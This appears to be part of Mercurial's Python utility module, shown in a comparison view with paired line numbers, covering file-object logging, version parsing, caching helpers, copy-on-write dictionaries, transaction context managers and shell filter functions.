    """Logs file object activity."""
    def __init__(self, fh, name, reads=True, writes=True, logdata=False):
        self.fh = fh            # stream receiving the log lines
        self.name = name        # label prefixed to every log line
        self.reads = reads      # whether read-side events are logged
        self.writes = writes    # whether write-side events are logged
        self.logdata = logdata  # whether payload bytes are dumped too

    def _writedata(self, data):
        # Payload dumping is opt-in; otherwise just end the log line.
        if not self.logdata:
            self.fh.write('\n')
            return

        # Simple case writes all data on a single line.
        if b'\n' not in data:
            self.fh.write(': %s\n' % escapedata(data))
            return

        # Data with newlines is written to multiple lines.
        self.fh.write(':\n')
        for line in data.splitlines(True):
            self.fh.write('%s> %s\n' % (self.name, escapedata(line)))

    def read(self, res, size=-1):
        if not self.reads:
            return
        # Python 3 can return None from reads at EOF instead of empty strings.
        if res is None:
            res = ''

        self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
        self._writedata(res)

    def readline(self, res, limit=-1):
        if not self.reads:
            return

        self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
        self._writedata(res)

    def readinto(self, res, dest):
        if not self.reads:
            return

        self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
                                                  res))
        # res is the number of bytes actually placed into dest (or None).
        data = dest[0:res] if res is not None else b''
        self._writedata(data)

    def write(self, res, data):
        if not self.writes:
            return

        # Python 2 returns None from some write() calls. Python 3 (reasonably)
        # returns the integer bytes written.
        if res is None and data:
            res = len(data)

        self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
        self._writedata(data)

    def flush(self, res):
        if not self.writes:
            return

        self.fh.write('%s> flush() -> %r\n' % (self.name, res))

    # For observedbufferedinputpipe.
    def bufferedread(self, res, size):
        self.fh.write('%s> bufferedread(%d) -> %d' % (
            self.name, size, len(res)))
        self._writedata(res)

    def bufferedreadline(self, res):
        self.fh.write('%s> bufferedreadline() -> %d' % (self.name, len(res)))
        self._writedata(res)
785
777
def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
                          logdata=False):
    """Turn a file object into a logging file object.

    Events on ``fh`` are logged to ``logh``, each line prefixed with
    ``name``. ``reads``/``writes``/``logdata`` select what gets logged.
    """
    return fileobjectproxy(
        fh, fileobjectobserver(logh, name, reads=reads, writes=writes,
                               logdata=logdata))
793
785
def version():
    """Return version information if available."""
    try:
        from . import __version__
    except ImportError:
        # Not built/installed with version metadata.
        return 'unknown'
    return __version__.version
801
793
def versiontuple(v=None, n=4):
    """Parses a Mercurial version string into an N-tuple.

    The version string to be parsed is specified with the ``v`` argument.
    If it isn't defined, the current Mercurial version string will be parsed.

    ``n`` can be 2, 3, or 4. Here is how some version strings map to
    returned values:

    >>> v = b'3.6.1+190-df9b73d2d444'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, 1)
    >>> versiontuple(v, 4)
    (3, 6, 1, '190-df9b73d2d444')

    >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
    (3, 6, 1, '190-df9b73d2d444+20151118')

    >>> v = b'3.6'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, None)
    >>> versiontuple(v, 4)
    (3, 6, None, None)

    >>> v = b'3.9-rc'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc')

    >>> v = b'3.9-rc+2-02a8fea4289b'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc+2-02a8fea4289b')
    """
    if not v:
        v = version()
    # Split off the "extra" part at the first '+' or '-'. The backslash
    # is doubled (rather than using '\+' in a non-raw literal, which is
    # an invalid escape sequence and warns on modern Python).
    parts = remod.split('[\\+-]', v, 1)
    if len(parts) == 1:
        vparts, extra = parts[0], None
    else:
        vparts, extra = parts

    vints = []
    for i in vparts.split('.'):
        try:
            vints.append(int(i))
        except ValueError:
            # Stop at the first non-numeric component (e.g. 'rc').
            break
    # (3, 6) -> (3, 6, None)
    while len(vints) < 3:
        vints.append(None)

    if n == 2:
        return (vints[0], vints[1])
    if n == 3:
        return (vints[0], vints[1], vints[2])
    if n == 4:
        return (vints[0], vints[1], vints[2], extra)
870
862
def cachefunc(func):
    '''cache the result of function calls'''
    # XXX doesn't handle keywords args
    argcount = func.__code__.co_argcount
    if argcount == 0:
        memo = []
        def f():
            if not memo:
                memo.append(func())
            return memo[0]
        return f
    memo = {}
    if argcount == 1:
        # Keying on the single argument directly avoids packing and
        # unpacking an args tuple on every call.
        def f(arg):
            if arg not in memo:
                memo[arg] = func(arg)
            return memo[arg]
    else:
        def f(*args):
            if args not in memo:
                memo[args] = func(*args)
            return memo[args]

    return f
896
888
class cow(object):
    """helper class to make copy-on-write easier

    Call preparewrite before doing any writes.
    """

    def preparewrite(self):
        """call this before writes, return self or a copied new object"""
        copied = getattr(self, '_copied', 0)
        if not copied:
            # No outstanding shared copies: safe to write in place.
            return self
        self._copied = copied - 1
        return self.__class__(self)

    def copy(self):
        """always do a cheap copy"""
        # Just bump the share count; the real copy is deferred until
        # someone calls preparewrite().
        self._copied = getattr(self, '_copied', 0) + 1
        return self
914
906
class sortdict(collections.OrderedDict):
    '''a simple sorted dictionary

    >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
    >>> d2 = d1.copy()
    >>> d2
    sortdict([('a', 0), ('b', 1)])
    >>> d2.update([(b'a', 2)])
    >>> list(d2.keys()) # should still be in last-set order
    ['b', 'a']
    '''

    def __setitem__(self, key, value):
        # Drop any existing entry first so re-insertion moves the key
        # to the end ("last set wins" ordering).
        if key in self:
            del self[key]
        super(sortdict, self).__setitem__(key, value)

    if pycompat.ispypy:
        # __setitem__() isn't called as of PyPy 5.8.0
        def update(self, src):
            if isinstance(src, dict):
                src = src.iteritems()
            for k, v in src:
                self[k] = v
939
931
class cowdict(cow, dict):
    """copy-on-write dict

    Be sure to call d = d.preparewrite() before writing to d.

    >>> a = cowdict()
    >>> a is a.preparewrite()
    True
    >>> b = a.copy()
    >>> b is a
    True
    >>> c = b.copy()
    >>> c is a
    True
    >>> a = a.preparewrite()
    >>> b is a
    False
    >>> a is a.preparewrite()
    True
    >>> c = c.preparewrite()
    >>> b is c
    False
    >>> b is b.preparewrite()
    True
    """
965
957
class cowsortdict(cow, sortdict):
    """copy-on-write sortdict

    Be sure to call d = d.preparewrite() before writing to d.
    """
971
963
class transactional(object):
    """Base class for making a transactional type into a context manager."""
    __metaclass__ = abc.ABCMeta

    @abc.abstractmethod
    def close(self):
        """Successfully closes the transaction."""

    @abc.abstractmethod
    def release(self):
        """Marks the end of the transaction.

        If the transaction has not been closed, it will be aborted.
        """

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        # Close only on a clean exit; release unconditionally (which
        # aborts the transaction when it was never closed).
        succeeded = exc_type is None
        try:
            if succeeded:
                self.close()
        finally:
            self.release()
996
988
@contextlib.contextmanager
def acceptintervention(tr=None):
    """A context manager that closes the transaction on InterventionRequired

    If no transaction was provided, this simply runs the body and returns
    """
    if not tr:
        yield
        return
    try:
        yield
        # Body finished normally: commit.
        tr.close()
    except error.InterventionRequired:
        # InterventionRequired is an expected pause point, not a
        # failure: commit what was done, then re-raise for the caller.
        tr.close()
        raise
    finally:
        # Always release; this aborts the transaction if it was never
        # closed (i.e. any other exception escaped the body).
        tr.release()
1014
1006
@contextlib.contextmanager
def nullcontextmanager():
    # No-op context manager: yields control with no setup or teardown.
    yield
1018
1010
class _lrucachenode(object):
    """A node in a doubly linked list.

    Holds a reference to nodes on either side as well as a key-value
    pair for the dictionary entry.
    """
    __slots__ = (u'next', u'prev', u'key', u'value')

    def __init__(self):
        # Links are wired up by the owning lrucachedict.
        self.prev = None
        self.next = None
        # An empty node is flagged by carrying the _notset sentinel.
        self.key = _notset
        self.value = None

    def markempty(self):
        """Mark the node as emptied."""
        self.key = _notset
1037
1029
1038 class lrucachedict(object):
1030 class lrucachedict(object):
1039 """Dict that caches most recent accesses and sets.
1031 """Dict that caches most recent accesses and sets.
1040
1032
1041 The dict consists of an actual backing dict - indexed by original
1033 The dict consists of an actual backing dict - indexed by original
1042 key - and a doubly linked circular list defining the order of entries in
1034 key - and a doubly linked circular list defining the order of entries in
1043 the cache.
1035 the cache.
1044
1036
1045 The head node is the newest entry in the cache. If the cache is full,
1037 The head node is the newest entry in the cache. If the cache is full,
1046 we recycle head.prev and make it the new head. Cache accesses result in
1038 we recycle head.prev and make it the new head. Cache accesses result in
1047 the node being moved to before the existing head and being marked as the
1039 the node being moved to before the existing head and being marked as the
1048 new head node.
1040 new head node.
1049 """
1041 """
1050 def __init__(self, max):
1042 def __init__(self, max):
1051 self._cache = {}
1043 self._cache = {}
1052
1044
1053 self._head = head = _lrucachenode()
1045 self._head = head = _lrucachenode()
1054 head.prev = head
1046 head.prev = head
1055 head.next = head
1047 head.next = head
1056 self._size = 1
1048 self._size = 1
1057 self._capacity = max
1049 self._capacity = max
1058
1050
1059 def __len__(self):
1051 def __len__(self):
1060 return len(self._cache)
1052 return len(self._cache)
1061
1053
1062 def __contains__(self, k):
1054 def __contains__(self, k):
1063 return k in self._cache
1055 return k in self._cache
1064
1056
1065 def __iter__(self):
1057 def __iter__(self):
1066 # We don't have to iterate in cache order, but why not.
1058 # We don't have to iterate in cache order, but why not.
1067 n = self._head
1059 n = self._head
1068 for i in range(len(self._cache)):
1060 for i in range(len(self._cache)):
1069 yield n.key
1061 yield n.key
1070 n = n.next
1062 n = n.next
1071
1063
1072 def __getitem__(self, k):
1064 def __getitem__(self, k):
1073 node = self._cache[k]
1065 node = self._cache[k]
1074 self._movetohead(node)
1066 self._movetohead(node)
1075 return node.value
1067 return node.value
1076
1068
    def __setitem__(self, k, v):
        """Insert or update ``k``, evicting the oldest entry at capacity."""
        node = self._cache.get(k)
        # Replace existing value and mark as newest.
        if node is not None:
            node.value = v
            self._movetohead(node)
            return

        if self._size < self._capacity:
            # Still growing toward capacity: allocate a fresh node.
            node = self._addcapacity()
        else:
            # Grab the last/oldest item.
            node = self._head.prev

            # At capacity. Kill the old entry.
            if node.key is not _notset:
                del self._cache[node.key]

        node.key = k
        node.value = v
        self._cache[k] = node
        # And mark it as newest entry. No need to adjust order since it
        # is already self._head.prev.
        self._head = node
1101
1093
    def __delitem__(self, k):
        """Remove ``k`` from the cache, recycling its node as oldest."""
        node = self._cache.pop(k)
        node.markempty()

        # Temporarily mark as newest item before re-adjusting head to make
        # this node the oldest item.
        self._movetohead(node)
        self._head = node.next
1110
1102
1111 # Additional dict methods.
1103 # Additional dict methods.
1112
1104
1113 def get(self, k, default=None):
1105 def get(self, k, default=None):
1114 try:
1106 try:
1115 return self._cache[k].value
1107 return self._cache[k].value
1116 except KeyError:
1108 except KeyError:
1117 return default
1109 return default
1118
1110
1119 def clear(self):
1111 def clear(self):
1120 n = self._head
1112 n = self._head
1121 while n.key is not _notset:
1113 while n.key is not _notset:
1122 n.markempty()
1114 n.markempty()
1123 n = n.next
1115 n = n.next
1124
1116
1125 self._cache.clear()
1117 self._cache.clear()
1126
1118
1127 def copy(self):
1119 def copy(self):
1128 result = lrucachedict(self._capacity)
1120 result = lrucachedict(self._capacity)
1129 n = self._head.prev
1121 n = self._head.prev
1130 # Iterate in oldest-to-newest order, so the copy has the right ordering
1122 # Iterate in oldest-to-newest order, so the copy has the right ordering
1131 for i in range(len(self._cache)):
1123 for i in range(len(self._cache)):
1132 result[n.key] = n.value
1124 result[n.key] = n.value
1133 n = n.prev
1125 n = n.prev
1134 return result
1126 return result
1135
1127
1136 def _movetohead(self, node):
1128 def _movetohead(self, node):
1137 """Mark a node as the newest, making it the new head.
1129 """Mark a node as the newest, making it the new head.
1138
1130
1139 When a node is accessed, it becomes the freshest entry in the LRU
1131 When a node is accessed, it becomes the freshest entry in the LRU
1140 list, which is denoted by self._head.
1132 list, which is denoted by self._head.
1141
1133
1142 Visually, let's make ``N`` the new head node (* denotes head):
1134 Visually, let's make ``N`` the new head node (* denotes head):
1143
1135
1144 previous/oldest <-> head <-> next/next newest
1136 previous/oldest <-> head <-> next/next newest
1145
1137
1146 ----<->--- A* ---<->-----
1138 ----<->--- A* ---<->-----
1147 | |
1139 | |
1148 E <-> D <-> N <-> C <-> B
1140 E <-> D <-> N <-> C <-> B
1149
1141
1150 To:
1142 To:
1151
1143
1152 ----<->--- N* ---<->-----
1144 ----<->--- N* ---<->-----
1153 | |
1145 | |
1154 E <-> D <-> C <-> B <-> A
1146 E <-> D <-> C <-> B <-> A
1155
1147
1156 This requires the following moves:
1148 This requires the following moves:
1157
1149
1158 C.next = D (node.prev.next = node.next)
1150 C.next = D (node.prev.next = node.next)
1159 D.prev = C (node.next.prev = node.prev)
1151 D.prev = C (node.next.prev = node.prev)
1160 E.next = N (head.prev.next = node)
1152 E.next = N (head.prev.next = node)
1161 N.prev = E (node.prev = head.prev)
1153 N.prev = E (node.prev = head.prev)
1162 N.next = A (node.next = head)
1154 N.next = A (node.next = head)
1163 A.prev = N (head.prev = node)
1155 A.prev = N (head.prev = node)
1164 """
1156 """
1165 head = self._head
1157 head = self._head
1166 # C.next = D
1158 # C.next = D
1167 node.prev.next = node.next
1159 node.prev.next = node.next
1168 # D.prev = C
1160 # D.prev = C
1169 node.next.prev = node.prev
1161 node.next.prev = node.prev
1170 # N.prev = E
1162 # N.prev = E
1171 node.prev = head.prev
1163 node.prev = head.prev
1172 # N.next = A
1164 # N.next = A
1173 # It is tempting to do just "head" here, however if node is
1165 # It is tempting to do just "head" here, however if node is
1174 # adjacent to head, this will do bad things.
1166 # adjacent to head, this will do bad things.
1175 node.next = head.prev.next
1167 node.next = head.prev.next
1176 # E.next = N
1168 # E.next = N
1177 node.next.prev = node
1169 node.next.prev = node
1178 # A.prev = N
1170 # A.prev = N
1179 node.prev.next = node
1171 node.prev.next = node
1180
1172
1181 self._head = node
1173 self._head = node
1182
1174
1183 def _addcapacity(self):
1175 def _addcapacity(self):
1184 """Add a node to the circular linked list.
1176 """Add a node to the circular linked list.
1185
1177
1186 The new node is inserted before the head node.
1178 The new node is inserted before the head node.
1187 """
1179 """
1188 head = self._head
1180 head = self._head
1189 node = _lrucachenode()
1181 node = _lrucachenode()
1190 head.prev.next = node
1182 head.prev.next = node
1191 node.prev = head.prev
1183 node.prev = head.prev
1192 node.next = head
1184 node.next = head
1193 head.prev = node
1185 head.prev = node
1194 self._size += 1
1186 self._size += 1
1195 return node
1187 return node
1196
1188
1197 def lrucachefunc(func):
1189 def lrucachefunc(func):
1198 '''cache most recent results of function calls'''
1190 '''cache most recent results of function calls'''
1199 cache = {}
1191 cache = {}
1200 order = collections.deque()
1192 order = collections.deque()
1201 if func.__code__.co_argcount == 1:
1193 if func.__code__.co_argcount == 1:
1202 def f(arg):
1194 def f(arg):
1203 if arg not in cache:
1195 if arg not in cache:
1204 if len(cache) > 20:
1196 if len(cache) > 20:
1205 del cache[order.popleft()]
1197 del cache[order.popleft()]
1206 cache[arg] = func(arg)
1198 cache[arg] = func(arg)
1207 else:
1199 else:
1208 order.remove(arg)
1200 order.remove(arg)
1209 order.append(arg)
1201 order.append(arg)
1210 return cache[arg]
1202 return cache[arg]
1211 else:
1203 else:
1212 def f(*args):
1204 def f(*args):
1213 if args not in cache:
1205 if args not in cache:
1214 if len(cache) > 20:
1206 if len(cache) > 20:
1215 del cache[order.popleft()]
1207 del cache[order.popleft()]
1216 cache[args] = func(*args)
1208 cache[args] = func(*args)
1217 else:
1209 else:
1218 order.remove(args)
1210 order.remove(args)
1219 order.append(args)
1211 order.append(args)
1220 return cache[args]
1212 return cache[args]
1221
1213
1222 return f
1214 return f
1223
1215
1224 class propertycache(object):
1216 class propertycache(object):
1225 def __init__(self, func):
1217 def __init__(self, func):
1226 self.func = func
1218 self.func = func
1227 self.name = func.__name__
1219 self.name = func.__name__
1228 def __get__(self, obj, type=None):
1220 def __get__(self, obj, type=None):
1229 result = self.func(obj)
1221 result = self.func(obj)
1230 self.cachevalue(obj, result)
1222 self.cachevalue(obj, result)
1231 return result
1223 return result
1232
1224
1233 def cachevalue(self, obj, value):
1225 def cachevalue(self, obj, value):
1234 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1226 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1235 obj.__dict__[self.name] = value
1227 obj.__dict__[self.name] = value
1236
1228
1237 def clearcachedproperty(obj, prop):
1229 def clearcachedproperty(obj, prop):
1238 '''clear a cached property value, if one has been set'''
1230 '''clear a cached property value, if one has been set'''
1239 if prop in obj.__dict__:
1231 if prop in obj.__dict__:
1240 del obj.__dict__[prop]
1232 del obj.__dict__[prop]
1241
1233
1242 def pipefilter(s, cmd):
1234 def pipefilter(s, cmd):
1243 '''filter string S through command CMD, returning its output'''
1235 '''filter string S through command CMD, returning its output'''
1244 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1236 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1245 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
1237 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
1246 pout, perr = p.communicate(s)
1238 pout, perr = p.communicate(s)
1247 return pout
1239 return pout
1248
1240
1249 def tempfilter(s, cmd):
1241 def tempfilter(s, cmd):
1250 '''filter string S through a pair of temporary files with CMD.
1242 '''filter string S through a pair of temporary files with CMD.
1251 CMD is used as a template to create the real command to be run,
1243 CMD is used as a template to create the real command to be run,
1252 with the strings INFILE and OUTFILE replaced by the real names of
1244 with the strings INFILE and OUTFILE replaced by the real names of
1253 the temporary files generated.'''
1245 the temporary files generated.'''
1254 inname, outname = None, None
1246 inname, outname = None, None
1255 try:
1247 try:
1256 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
1248 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
1257 fp = os.fdopen(infd, pycompat.sysstr('wb'))
1249 fp = os.fdopen(infd, pycompat.sysstr('wb'))
1258 fp.write(s)
1250 fp.write(s)
1259 fp.close()
1251 fp.close()
1260 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
1252 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
1261 os.close(outfd)
1253 os.close(outfd)
1262 cmd = cmd.replace('INFILE', inname)
1254 cmd = cmd.replace('INFILE', inname)
1263 cmd = cmd.replace('OUTFILE', outname)
1255 cmd = cmd.replace('OUTFILE', outname)
1264 code = os.system(cmd)
1256 code = os.system(cmd)
1265 if pycompat.sysplatform == 'OpenVMS' and code & 1:
1257 if pycompat.sysplatform == 'OpenVMS' and code & 1:
1266 code = 0
1258 code = 0
1267 if code:
1259 if code:
1268 raise Abort(_("command '%s' failed: %s") %
1260 raise Abort(_("command '%s' failed: %s") %
1269 (cmd, explainexit(code)))
1261 (cmd, explainexit(code)))
1270 return readfile(outname)
1262 return readfile(outname)
1271 finally:
1263 finally:
1272 try:
1264 try:
1273 if inname:
1265 if inname:
1274 os.unlink(inname)
1266 os.unlink(inname)
1275 except OSError:
1267 except OSError:
1276 pass
1268 pass
1277 try:
1269 try:
1278 if outname:
1270 if outname:
1279 os.unlink(outname)
1271 os.unlink(outname)
1280 except OSError:
1272 except OSError:
1281 pass
1273 pass
1282
1274
1283 filtertable = {
1275 filtertable = {
1284 'tempfile:': tempfilter,
1276 'tempfile:': tempfilter,
1285 'pipe:': pipefilter,
1277 'pipe:': pipefilter,
1286 }
1278 }
1287
1279
1288 def filter(s, cmd):
1280 def filter(s, cmd):
1289 "filter a string through a command that transforms its input to its output"
1281 "filter a string through a command that transforms its input to its output"
1290 for name, fn in filtertable.iteritems():
1282 for name, fn in filtertable.iteritems():
1291 if cmd.startswith(name):
1283 if cmd.startswith(name):
1292 return fn(s, cmd[len(name):].lstrip())
1284 return fn(s, cmd[len(name):].lstrip())
1293 return pipefilter(s, cmd)
1285 return pipefilter(s, cmd)
1294
1286
1295 def binary(s):
1287 def binary(s):
1296 """return true if a string is binary data"""
1288 """return true if a string is binary data"""
1297 return bool(s and '\0' in s)
1289 return bool(s and '\0' in s)
1298
1290
1299 def increasingchunks(source, min=1024, max=65536):
1291 def increasingchunks(source, min=1024, max=65536):
1300 '''return no less than min bytes per chunk while data remains,
1292 '''return no less than min bytes per chunk while data remains,
1301 doubling min after each chunk until it reaches max'''
1293 doubling min after each chunk until it reaches max'''
1302 def log2(x):
1294 def log2(x):
1303 if not x:
1295 if not x:
1304 return 0
1296 return 0
1305 i = 0
1297 i = 0
1306 while x:
1298 while x:
1307 x >>= 1
1299 x >>= 1
1308 i += 1
1300 i += 1
1309 return i - 1
1301 return i - 1
1310
1302
1311 buf = []
1303 buf = []
1312 blen = 0
1304 blen = 0
1313 for chunk in source:
1305 for chunk in source:
1314 buf.append(chunk)
1306 buf.append(chunk)
1315 blen += len(chunk)
1307 blen += len(chunk)
1316 if blen >= min:
1308 if blen >= min:
1317 if min < max:
1309 if min < max:
1318 min = min << 1
1310 min = min << 1
1319 nmin = 1 << log2(blen)
1311 nmin = 1 << log2(blen)
1320 if nmin > min:
1312 if nmin > min:
1321 min = nmin
1313 min = nmin
1322 if min > max:
1314 if min > max:
1323 min = max
1315 min = max
1324 yield ''.join(buf)
1316 yield ''.join(buf)
1325 blen = 0
1317 blen = 0
1326 buf = []
1318 buf = []
1327 if buf:
1319 if buf:
1328 yield ''.join(buf)
1320 yield ''.join(buf)
1329
1321
1330 Abort = error.Abort
1322 Abort = error.Abort
1331
1323
1332 def always(fn):
1324 def always(fn):
1333 return True
1325 return True
1334
1326
1335 def never(fn):
1327 def never(fn):
1336 return False
1328 return False
1337
1329
1338 def nogc(func):
1330 def nogc(func):
1339 """disable garbage collector
1331 """disable garbage collector
1340
1332
1341 Python's garbage collector triggers a GC each time a certain number of
1333 Python's garbage collector triggers a GC each time a certain number of
1342 container objects (the number being defined by gc.get_threshold()) are
1334 container objects (the number being defined by gc.get_threshold()) are
1343 allocated even when marked not to be tracked by the collector. Tracking has
1335 allocated even when marked not to be tracked by the collector. Tracking has
1344 no effect on when GCs are triggered, only on what objects the GC looks
1336 no effect on when GCs are triggered, only on what objects the GC looks
1345 into. As a workaround, disable GC while building complex (huge)
1337 into. As a workaround, disable GC while building complex (huge)
1346 containers.
1338 containers.
1347
1339
1348 This garbage collector issue have been fixed in 2.7. But it still affect
1340 This garbage collector issue have been fixed in 2.7. But it still affect
1349 CPython's performance.
1341 CPython's performance.
1350 """
1342 """
1351 def wrapper(*args, **kwargs):
1343 def wrapper(*args, **kwargs):
1352 gcenabled = gc.isenabled()
1344 gcenabled = gc.isenabled()
1353 gc.disable()
1345 gc.disable()
1354 try:
1346 try:
1355 return func(*args, **kwargs)
1347 return func(*args, **kwargs)
1356 finally:
1348 finally:
1357 if gcenabled:
1349 if gcenabled:
1358 gc.enable()
1350 gc.enable()
1359 return wrapper
1351 return wrapper
1360
1352
1361 if pycompat.ispypy:
1353 if pycompat.ispypy:
1362 # PyPy runs slower with gc disabled
1354 # PyPy runs slower with gc disabled
1363 nogc = lambda x: x
1355 nogc = lambda x: x
1364
1356
1365 def pathto(root, n1, n2):
1357 def pathto(root, n1, n2):
1366 '''return the relative path from one place to another.
1358 '''return the relative path from one place to another.
1367 root should use os.sep to separate directories
1359 root should use os.sep to separate directories
1368 n1 should use os.sep to separate directories
1360 n1 should use os.sep to separate directories
1369 n2 should use "/" to separate directories
1361 n2 should use "/" to separate directories
1370 returns an os.sep-separated path.
1362 returns an os.sep-separated path.
1371
1363
1372 If n1 is a relative path, it's assumed it's
1364 If n1 is a relative path, it's assumed it's
1373 relative to root.
1365 relative to root.
1374 n2 should always be relative to root.
1366 n2 should always be relative to root.
1375 '''
1367 '''
1376 if not n1:
1368 if not n1:
1377 return localpath(n2)
1369 return localpath(n2)
1378 if os.path.isabs(n1):
1370 if os.path.isabs(n1):
1379 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1371 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1380 return os.path.join(root, localpath(n2))
1372 return os.path.join(root, localpath(n2))
1381 n2 = '/'.join((pconvert(root), n2))
1373 n2 = '/'.join((pconvert(root), n2))
1382 a, b = splitpath(n1), n2.split('/')
1374 a, b = splitpath(n1), n2.split('/')
1383 a.reverse()
1375 a.reverse()
1384 b.reverse()
1376 b.reverse()
1385 while a and b and a[-1] == b[-1]:
1377 while a and b and a[-1] == b[-1]:
1386 a.pop()
1378 a.pop()
1387 b.pop()
1379 b.pop()
1388 b.reverse()
1380 b.reverse()
1389 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1381 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1390
1382
1391 def mainfrozen():
1383 def mainfrozen():
1392 """return True if we are a frozen executable.
1384 """return True if we are a frozen executable.
1393
1385
1394 The code supports py2exe (most common, Windows only) and tools/freeze
1386 The code supports py2exe (most common, Windows only) and tools/freeze
1395 (portable, not much used).
1387 (portable, not much used).
1396 """
1388 """
1397 return (safehasattr(sys, "frozen") or # new py2exe
1389 return (safehasattr(sys, "frozen") or # new py2exe
1398 safehasattr(sys, "importers") or # old py2exe
1390 safehasattr(sys, "importers") or # old py2exe
1399 imp.is_frozen(u"__main__")) # tools/freeze
1391 imp.is_frozen(u"__main__")) # tools/freeze
1400
1392
1401 # the location of data files matching the source code
1393 # the location of data files matching the source code
1402 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1394 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1403 # executable version (py2exe) doesn't support __file__
1395 # executable version (py2exe) doesn't support __file__
1404 datapath = os.path.dirname(pycompat.sysexecutable)
1396 datapath = os.path.dirname(pycompat.sysexecutable)
1405 else:
1397 else:
1406 datapath = os.path.dirname(pycompat.fsencode(__file__))
1398 datapath = os.path.dirname(pycompat.fsencode(__file__))
1407
1399
1408 i18n.setdatapath(datapath)
1400 i18n.setdatapath(datapath)
1409
1401
1410 _hgexecutable = None
1402 _hgexecutable = None
1411
1403
1412 def hgexecutable():
1404 def hgexecutable():
1413 """return location of the 'hg' executable.
1405 """return location of the 'hg' executable.
1414
1406
1415 Defaults to $HG or 'hg' in the search path.
1407 Defaults to $HG or 'hg' in the search path.
1416 """
1408 """
1417 if _hgexecutable is None:
1409 if _hgexecutable is None:
1418 hg = encoding.environ.get('HG')
1410 hg = encoding.environ.get('HG')
1419 mainmod = sys.modules[pycompat.sysstr('__main__')]
1411 mainmod = sys.modules[pycompat.sysstr('__main__')]
1420 if hg:
1412 if hg:
1421 _sethgexecutable(hg)
1413 _sethgexecutable(hg)
1422 elif mainfrozen():
1414 elif mainfrozen():
1423 if getattr(sys, 'frozen', None) == 'macosx_app':
1415 if getattr(sys, 'frozen', None) == 'macosx_app':
1424 # Env variable set by py2app
1416 # Env variable set by py2app
1425 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1417 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1426 else:
1418 else:
1427 _sethgexecutable(pycompat.sysexecutable)
1419 _sethgexecutable(pycompat.sysexecutable)
1428 elif (os.path.basename(
1420 elif (os.path.basename(
1429 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1421 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1430 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1422 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1431 else:
1423 else:
1432 exe = findexe('hg') or os.path.basename(sys.argv[0])
1424 exe = findexe('hg') or os.path.basename(sys.argv[0])
1433 _sethgexecutable(exe)
1425 _sethgexecutable(exe)
1434 return _hgexecutable
1426 return _hgexecutable
1435
1427
1436 def _sethgexecutable(path):
1428 def _sethgexecutable(path):
1437 """set location of the 'hg' executable"""
1429 """set location of the 'hg' executable"""
1438 global _hgexecutable
1430 global _hgexecutable
1439 _hgexecutable = path
1431 _hgexecutable = path
1440
1432
1441 def _isstdout(f):
1433 def _isstdout(f):
1442 fileno = getattr(f, 'fileno', None)
1434 fileno = getattr(f, 'fileno', None)
1443 try:
1435 try:
1444 return fileno and fileno() == sys.__stdout__.fileno()
1436 return fileno and fileno() == sys.__stdout__.fileno()
1445 except io.UnsupportedOperation:
1437 except io.UnsupportedOperation:
1446 return False # fileno() raised UnsupportedOperation
1438 return False # fileno() raised UnsupportedOperation
1447
1439
1448 def shellenviron(environ=None):
1440 def shellenviron(environ=None):
1449 """return environ with optional override, useful for shelling out"""
1441 """return environ with optional override, useful for shelling out"""
1450 def py2shell(val):
1442 def py2shell(val):
1451 'convert python object into string that is useful to shell'
1443 'convert python object into string that is useful to shell'
1452 if val is None or val is False:
1444 if val is None or val is False:
1453 return '0'
1445 return '0'
1454 if val is True:
1446 if val is True:
1455 return '1'
1447 return '1'
1456 return pycompat.bytestr(val)
1448 return pycompat.bytestr(val)
1457 env = dict(encoding.environ)
1449 env = dict(encoding.environ)
1458 if environ:
1450 if environ:
1459 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1451 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1460 env['HG'] = hgexecutable()
1452 env['HG'] = hgexecutable()
1461 return env
1453 return env
1462
1454
1463 def system(cmd, environ=None, cwd=None, out=None):
1455 def system(cmd, environ=None, cwd=None, out=None):
1464 '''enhanced shell command execution.
1456 '''enhanced shell command execution.
1465 run with environment maybe modified, maybe in different dir.
1457 run with environment maybe modified, maybe in different dir.
1466
1458
1467 if out is specified, it is assumed to be a file-like object that has a
1459 if out is specified, it is assumed to be a file-like object that has a
1468 write() method. stdout and stderr will be redirected to out.'''
1460 write() method. stdout and stderr will be redirected to out.'''
1469 try:
1461 try:
1470 stdout.flush()
1462 stdout.flush()
